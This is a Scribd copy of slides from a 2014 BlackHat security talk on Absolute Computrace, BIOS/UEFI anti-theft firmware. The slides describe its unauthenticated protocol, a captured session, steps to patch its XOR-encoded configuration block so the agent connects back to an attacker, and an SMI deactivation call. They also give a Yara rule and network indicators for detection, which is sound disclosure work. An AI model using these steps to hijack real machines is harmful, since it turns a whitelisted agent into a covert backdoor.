Scribd
Upload
26 views20 pages

Us 14 Kamlyuk Kamluk Computrace Backdoor Revisited

The document discusses Computrace, an anti-theft software that is embedded in computer BIOS or UEFI firmware. It can be activated on system boot and installs services that connect to a control server. The research found Computrace was active on private laptops without owner consent. Upon investigation, it was discovered Computrace uses remote code execution and has design flaws that could allow an attacker to control the victim's system if they intercept network traffic. The document provides details on how Computrace communicates and potential ways it could be abused to enable unauthorized access or covert backdoors.

Uploaded by

blimy
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
26 views20 pages

Us 14 Kamlyuk Kamluk Computrace Backdoor Revisited

The document discusses Computrace, an anti-theft software that is embedded in computer BIOS or UEFI firmware. It can be activated on system boot and installs services that connect to a control server. The research found Computrace was active on private laptops without owner consent. Upon investigation, it was discovered Computrace uses remote code execution and has design flaws that could allow an attacker to control the victim's system if they intercept network traffic. The document provides details on how Computrace communicates and potential ways it could be abused to enable unauthorized access or covert backdoors.

Uploaded by

blimy
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 20

Absolute Backdoor Revisited

Vitaliy Kamlyuk, Kaspersky Lab


Sergey Belov, Kaspersky Lab
Anibal Sacco, Cubica Labs

BlackHat, Las Vegas


August, 2014
What is Computrace?
Computrace is an Anti-Theft software product developed by Absolute Software, which is embedded in
BIOS PCI Optional ROM or UEFI Firmware, which can be activated on system boot and creates
Windows service by dropping executable file on Windows filesystems.

*Images are taken from US Patent 20060272020 A1


Why is this research?
We have discovered that some of our private laptops were running
Absolute Computrace without prior consent of legitimate owners.

Later we found a new computer on sale at a local retail shop which also
had Computrace running on it.

We decided to investigate who, why and how has activated Computrace


on these computers and if that created any security breach on our
systems.
How does it work?
Computrace has 4 stages of operation:
1. BIOS/UEFI module locates FAT32/NTFS partition and injects code into Windows Autochk.exe
native application.
2. Modified autochk.exe registers new system service for rpcnetp.exe.
3. rpcnetp.exe connects to control server to download additional executable components and a
replacement for rpcnetp.exe which will be started as a service rpcnet each time system boots.

4. rpcnet.exe connects to control server each time system starts. If the service/file is removed, the
procedure starts again from the beginning.
Remote Code Execution/Design Flaw
Computrace by design does remote code execution. The small rpcnetp.exe agent is easily exploitable
as it doesn't implement any server authentication mechanism. Assuming that an attacker is able to
control victim's network traffic (ARP poisoning, DNS hijacking, etc) it's possible to execute arbitrary
code remotely. DEMO!

The protocol defines two primitives:


1. Read data from memory
2. Write data to memory
Remote Code Execution/Exploit
When Computrace agent connects to a control server it updates to a more secure main agent rpcnet.
exe. The main agent implements security checks which prevent simple RCE. However,
implementation has weakness and allows to easily override security settings which enables arbitrary
code execution again. DEMO!
Sample communication session
1. c
2. s 7e ff ff ff ff 04 00 e5 de 00 70 08 96 e8 7e
3. c 7e e5 de 00 70 04 00 c0 fe 88 00 09 a9 f0 7e
4. s 7e ff ff ff ff 04 00 e5 de 00 70 19 94 f8 7e
5. c 7e e5 de 00 70 e5 de 00 70 84 00 c0 fe 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 1a 0f 21 7e
6. s 7e c0 fe 88 00 0c 00 2a b7 be 7e
7. c 7e e5 de 00 70 e5 de 00 70 0c 00 02 00 a4 03 05 01 28 0a 00 f0 73 00 2b 45 16 7e
8. s 7e c8 fe 88 00 04 00 3b 8f a2 7e
9. c 7e e5 de 00 70 e5 de 00 70 04 00 00 f0 73 00 3c 45 8c 7e
10. s 7e cc fe 88 00 0c 00 07 00 00 00 0c 93 00 00 d4 fe 88 00 4c 45 40 7e
11. c 7e e5 de 00 70 e5 de 00 70 04 00 a4 3c 1b 00 4d 46 04 7e
12. s 7e ac 3c 1b 00 02 00 78 05 5d c7 e6 7e
13. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 5e 67 f1 7e
14. s 7e d8 fe 88 00 04 00 ac 3c 1b 00 6e 93 68 7e
15. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 6f 41 83 7e
16. s 7e 3a 42 1b 00 02 00 78 05 7f 5b 1f 7e
17. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 78 23 55 7e 7e Separator, always 0x7e
18. s 7e dc fe 88 00 04 00 08 7f 2f 7e
19. c 7e e5 de 00 70 e5 de 00 70 04 00 28 fd 88 00 09 03 c6 7e 7c Memory address (server) or SessionID (client)
20. s 7e 2c fd 88 00 04 00 19 9c 47 7e 04 Size of payload data
21. c 7e e5 de 00 70 e5 de 00 70 04 00 e5 de 00 70 1a 05 66 7e
22. s 7e 3e 42 1b 00 04 00 e5 de 00 70 2a 09 5d 7e 01 Payload data to be written
23. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 2b 49 c3 7e
00 Payload data that was read by the client
24. s 7e 32 42 1b 00 04 00 e5 de 00 70 3b f8 84 7e
25. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 3c 2b 15 7e 6e Sequence number
26. s 7e dc fe 88 00 04 00 3a 42 1b 00 4c cd 2f 7e
27. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 4d 45 a3 7e 84 Packet checksum
Communication explained
COMPUTRACISH: ENGLISH:
1. c

2. s 7e ff ff ff ff 04 00 e5 de 00 70 08 96 e8 7e

3. c 7e e5 de 00 70 04 00 c0 fe 88 00 09 a9 f0 7e

4. s 7e ff ff ff ff 04 00 e5 de 00 70 19 94 f8 7e

5. c 7e e5 de 00 70 e5 de 00 70 84 00 c0 fe 88 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 1a 0f 21 7e

6. s 7e c0 fe 88 00 0c 00 2a b7 be 7e

7. c 7e e5 de 00 70 e5 de 00 70 0c 00 02 00 a4 03 05
01 28 0a 00 f0 73 00 2b 45 16 7e

8. s 7e c8 fe 88 00 04 00 3b 8f a2 7e

9. c 7e e5 de 00 70 e5 de 00 70 04 00 00 f0 73 00 3c
45 8c 7e
Communication explained
COMPUTRACISH: ENGLISH:

10. s 7e cc fe 88 00 0c 00 07 00 00 00 0c 93 00 00 d4
fe 88 00 4c 45 40 7e

11. c 7e e5 de 00 70 e5 de 00 70 04 00 a4 3c 1b 00 4d
46 04 7e

12. s 7e ac 3c 1b 00 02 00 78 05 5d c7 e6 7e

13. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 5e
67 f1 7e

14. s 7e d8 fe 88 00 04 00 ac 3c 1b 00 6e 93 68 7e

15. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 6f
41 83 7e

16. s 7e 3a 42 1b 00 02 00 78 05 7f 5b 1f 7e

17. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 78
23 55 7e
Communication explained
COMPUTRACISH: ENGLISH:

18. s 7e dc fe 88 00 04 00 08 7f 2f 7e

19. c 7e e5 de 00 70 e5 de 00 70 04 00 28 fd 88 00 09
03 c6 7e

20. s 7e 2c fd 88 00 04 00 19 9c 47 7e

21. c 7e e5 de 00 70 e5 de 00 70 04 00 e5 de 00 70 1a
05 66 7e

22. s 7e 3e 42 1b 00 04 00 e5 de 00 70 2a 09 5d 7e

23. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 2b
49 c3 7e

24. s 7e 32 42 1b 00 04 00 e5 de 00 70 3b f8 84 7e

25. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 3c
2b 15 7e

26. s 7e dc fe 88 00 04 00 3a 42 1b 00 4c cd 2f 7e

27. c 7e e5 de 00 70 e5 de 00 70 04 00 02 00 a4 03 4d
45 a3 7e
Local attacks
● rpcnetp.exe (BIOS/UEFI dropped small agent) is the first component to
establish a connection with control server

● Once connected, it exposes an interface that offers full system access to


the control server

● Currently used as a way to deploy the second stage (rpcnet.exe)


component

● Because of legitimate nature of this software, it is whitelisted by most anti-


malware vendors
○ Not digitally signed (hash-based whitelisting is used instead)
Local attacks (O brother, where art
thou?)
In order to obtain the Control Server address, rpcnetp.exe relies on a small
data chunk called Configuration Block.

This data block is placed in many locations in a fully deployed Computrace


environment:

● Windows Registry

● Inter-partition space

● Embedded in rpcnetp.exe
Local attacks - Configuration Block
The configuration block stores information like IP, port and URL of report, as
well as expiration date and AT commands (The agent has modem reporting
capabilities too).

It is protected by an encryption method consisting of a single 8bit XOR


operation.

Note: Depending on the location of the block, the protection varies a bit. In the
Windows registry it is protected by two passes of an 8bit XOR :)
Local attacks - rpcnetp.exe modification
This schema could be easily abused as the small agent blindly depends on the
block content.

At 2009 BH talk we released a tool to demonstrate redirection through registry


modification. This would let an attacker to obtain a disguised connect back
method.

The same approach can be applied to rpcnetp.exe. Really simple:


● Finding configuration block
● Decoding
● Patching
● Re-encoding

Additionally, a few nops can be added to force the connect back.


Local attacks - rpcnetp.exe modification

Not digitally signed binary + Whitelisted + Modification

Dangerous connect back mechanism

[ DEMO ]
How to detect Computrace?
Original Absolute Computrace can be detected in the process list. Check one of the names:
1. rpcnetp.exe
2. rpcnet.exe

However, if someone renamed it and used as a backdoor, it's recommended to scan HDD with the
following Yara rule (download free yara tool here http://plusvic.github.io/yara/):

rule ComputraceAgent
{
meta:
description = "Absolute Computrace Agent Executable"
thread_level = 3
in_the_wild = true
strings:
$a = {D1 E0 F5 8B 4D 0C 83 D1 00 8B EC FF 33 83 C3 04}
$mz = {4d 5a}
$b1 = {72 70 63 6E 65 74 70 2E 65 78 65 00 72 70 63 6E 65 74 70 00}
$b2 = {54 61 67 49 64 00}
condition:
($mz at 0 ) and ($a or ($b1 and $b2))
}
How about network detection?
Original Absolute Computrace can be detected on the network by discovering a connection to one of
the following hosts:
● 209.53.113.223
● search.namequery.com
● search2.namequery.com
● search64.namequery.com
● search.us.namequery.com
● bh.namequery.com
● namequery.nettrace.co.za
● m229.absolute.com or any m*.absolute.com

Another method may generically detect Computrace protocol by discovering the following binary data
in HTTP server response:

7e ff ff ff ff 04 00 ?? ?? ?? ?? 08 ?? ?? 7e
Who activated Computrace?
First, our investigation showed that Computrace
modules on our machines were first executed on the
day when the computers were purchased at a retail
shop. It indicates that it was preactivated by
manufacturer.

Second, we have purchased a brand new laptop and


found traces of Absolute modules in slack space of the
hard drive. When we recovered files we found Absolute
Certification Tool which presumably was used by the
vendor to test Computrace. The tool does full cycle of
activation, check and deactivation of the BIOS/UEFI
dropper and fails at the last stage leaving the system
with activated persistence.

We believe that persistence was erroneously activated


due to the bug in this tool. We don't think this bug was
introduced on purpose.
How to deactivate Computrace?
This is very vendor specific, but most common way - generate System Management Interrupt
asm volatile("outb %%al, %%dx" : "=a" (result) : "d"(port), "a"(magic), "b"(password));
● “port” - SMI I/O port number. Usually 0xB2, but can be varied.
● “magic” - SMI signature, vendor depended value in EAX (0x544241CA in our case)
● “password” - magic value in EBX used during activation procedure

Password hardcoded in Absolute Certification Tool is 0x12345678


“result” doesn’t specify current operation status so password brute force was not possible in our
case. Lack of password verification means that the next call will reactivate agent with new password.

# dmidecode
Handle 0x0020, DMI type 11, 5 bytes
OEM Strings
String 1: voIHKSB3UVm0R
String 2: N1bTA2-Di8CG0
String 3: 5nbewuF6GBX2S
Thank you!
Log of events:
02/03/2014: we sent a report about vulnerability in Computrace protocol design to Absolute Software.
03/12/2014: no reaction from Absolute Software. We published report.
03/13/2014: Absolute Software released an infosheet denying the breach and prior notification from us.
...
25/06/2014: we discovered and notified Absolute Software about second RCE vulnerability. Absolute Software confirmed receiving our
analysis but denied existence of vulnerabilities.

Vitaly Kamluk, Principal Security Researcher, Kaspersky Lab


@vkamluk, Vitaly.Kamluk {could be at} kaspersky {dot} com

Sergey Belov, Principal Security Researcher, Kaspersky Lab


Sergey.Belov {definitely at} kaspersky {dot} com

Anibal Sacco, Security Researcher / Co-founder, Cubica Labs


@hannibals, asacco {could be at} cubicalabs {dot} com

You might also like